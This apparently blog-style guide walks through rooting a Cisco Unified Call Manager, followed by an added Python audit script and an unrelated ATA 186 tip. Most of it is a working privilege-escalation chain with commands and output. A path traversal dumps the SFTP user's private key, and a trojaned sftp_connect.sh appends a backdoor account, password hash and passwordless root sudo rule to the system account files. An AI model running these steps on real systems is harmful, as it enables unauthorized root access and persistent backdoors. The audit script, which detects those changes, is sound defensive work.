Jailbreak Cisco Unified Call Manager

  1. Connect to the administrator CLI using SSH
  2. Run the command file dump sftpdetails ../.ssh/id_dsa. This should give you the private key of the SFTP user:
    admin:file dump sftpdetails ../.ssh/id_dsa
    
  3. Create a file on your local machine, containing the private key just obtained. We will use c:\temp\id.ots in this example.
    C:\>copy con c:\temp\id.ots
    ^Z
            1 file(s) copied.
    
  4. If you are using PuTTY, you will have to change the key format from OpenSSH to PuTTY using:
    C:\> puttygen c:\TEMP\id.ots
    

    Save the private key (with or without passphrase) to another file, e.g. c:\temp\id.ppk.

  5. Employ your favorite SFTP tool to connect as sftpuser to your CUCM. Here, we are using psftp.exe from the PuTTY team:
    C:\>psftp -2 -i c:\TEMP\id.ppk [email protected]
    Using username "sftpuser".
    Remote working directory is /home/sftpuser
    psftp>
    
  6. Get the file sftp_connect.sh:
    psftp> get sftp_connect.sh
    remote:/home/sftpuser/sftp_connect.sh => local:sftp_connect.sh
    psftp>exit
    
  7. You can open the file locally now in your favorite editor. Add the following lines after the first line. Make sure that your editor understands the difference between Windows and UNIX line endings! You can use UltraEdit for that task.
    chattr -i /etc/passwd
    chattr -i /etc/shadow
    echo 'jail:x:1337:1337::/tmp:/bin/bash' >> /etc/passwd
    echo 'jail:$1$knkuI5HP$sNn3SJJ/95E.9iD.vvnyw.:14714:1:99999:7:::' >> /etc/shadow
    echo 'jail ALL=(root) NOPASSWD: /bin/bash' >> /etc/sudoers
    chattr +i /etc/passwd
    chattr +i /etc/shadow
    
  8. Now we connect using the sftpuser again and replace the file sftp_connect.sh:
    C:\TEMP\>psftp -2 -i c:\TEMP\id.ppk [email protected]
    Using username "sftpuser".
    Remote working directory is /home/sftpuser
    psftp> del sftp_connect.sh
    rm /home/sftpuser/sftp_connect.sh: OK
    psftp> put sftp_connect.sh
    local:sftp_connect.sh => remote:/home/sftpuser/sftp_connect.sh
    psftp> chmod 555 sftp_connect.sh
    /home/sftpuser/sftp_connect.sh: 0644 -> 0555
    psftp>exit
    
  9. Back in the CUCM administrator CLI, execute the command file get tftp os7920.txt to trigger the modified script. The command line does say TFTP rather than SFTP; that is correct. It doesn’t matter what you answer to the CLI questions, as long as the file (e.g. os7920.txt) exists and you answer y to the first question.
    admin:file get tftp os7920.txt
    Please wait while the system is gathering files info ...done.
    Sub-directories were not traversed.
    Number of files affected: 1
    Total size in Bytes: 22
    Total size in Kbytes: 0.021484375
    Would you like to proceed [y/n]? y
    SFTP server IP: doesNotMatter
    SFTP server port [22]:
    User ID: SoonToBeRoot
    Password: ***
    
    Download directory: InYourFace
    
    Could not connect to host doesNotMatter on port 22. Please verify SFTP settings.
    admin:
    
  10. Finally, connect to your CUCM using SSH with the user name jail and the password break, then elevate your privileges using sudo /bin/bash:
    login as: jail
    [email protected]'s password:
    
    -bash-3.00$ sudo /bin/bash
    bash-3.00# id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    bash-3.00#
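
To check a system for the changes this procedure leaves behind, the following added example (not part of the original write-up) audits the contents of sftp_connect.sh, /etc/passwd and /etc/sudoers for the kind of lines shown in step 7. The sample inputs, the sftp line in the sample script, the sftpuser UID and the baseline account set are constructed assumptions.

```python
import re

# Things sftp_connect.sh has no reason to touch (assumption about the stock script).
SENSITIVE = re.compile(r"/etc/(passwd|shadow|sudoers)\b|\bchattr\b")
SHELLS = ("/bin/bash", "/bin/sh")
SUDO_RULE = re.compile(r"^([^#\s]\S*)\s+\S+?=\s*(?:\([^)]*\))?\s*NOPASSWD:\s*(.+)$")


def audit_script(text):
    """Return (line number, line) for non-comment lines touching account files."""
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if not line.lstrip().startswith("#") and SENSITIVE.search(line)]


def audit_passwd(text, baseline):
    """Return (name, uid, home) for shell accounts missing from the baseline."""
    hits = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) == 7 and f[0] not in baseline and f[6] in SHELLS:
            hits.append((f[0], int(f[2]), f[5]))
    return hits


def audit_sudoers(text):
    """Return users with a passwordless sudo rule for an interactive shell."""
    hits = []
    for line in text.splitlines():
        m = SUDO_RULE.match(line.strip())
        if m and any(c.strip() in SHELLS for c in m.group(2).split(",")):
            hits.append(m.group(1))
    return hits


# Constructed samples: lines 2-5 of SCRIPT and the jail entries follow step 7;
# the sftp line, the sftpuser UID and BASELINE are assumptions.
SCRIPT = """#!/bin/bash
chattr -i /etc/passwd
echo 'jail:x:1337:1337::/tmp:/bin/bash' >> /etc/passwd
echo 'jail ALL=(root) NOPASSWD: /bin/bash' >> /etc/sudoers
chattr +i /etc/passwd
sftp -oPort="$2" "$1@$3"
"""
PASSWD = ("root:x:0:0:root:/root:/bin/bash\nsftpuser:x:501:501::/home/sftpuser:/bin/bash\n"
          "jail:x:1337:1337::/tmp:/bin/bash\n")
SUDOERS = "root ALL=(ALL) ALL\njail ALL=(root) NOPASSWD: /bin/bash\n"
BASELINE = {"root", "sftpuser"}

if __name__ == "__main__":
    print(audit_script(SCRIPT), audit_passwd(PASSWD, BASELINE), audit_sudoers(SUDOERS))
```

In practice the baseline would come from a known-good copy of /etc/passwd, and any hit in sftp_connect.sh is worth comparing against the file shipped with the installed version.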
    
Cisco ATA 186 and 10.1.1.1

If you notice any issues on your firewall regarding your ATA 186, it’s most likely because of a factory hardware error that causes the ATA to try to create a route to a nonexistent CCM at 10.1.1.1 as a backup. Find the IP address of your ATA, enter it in your browser and append /dev to the URL. On the SCCP page, change both CCM addresses to your own addresses. If you only have one CCM, put it in both boxes.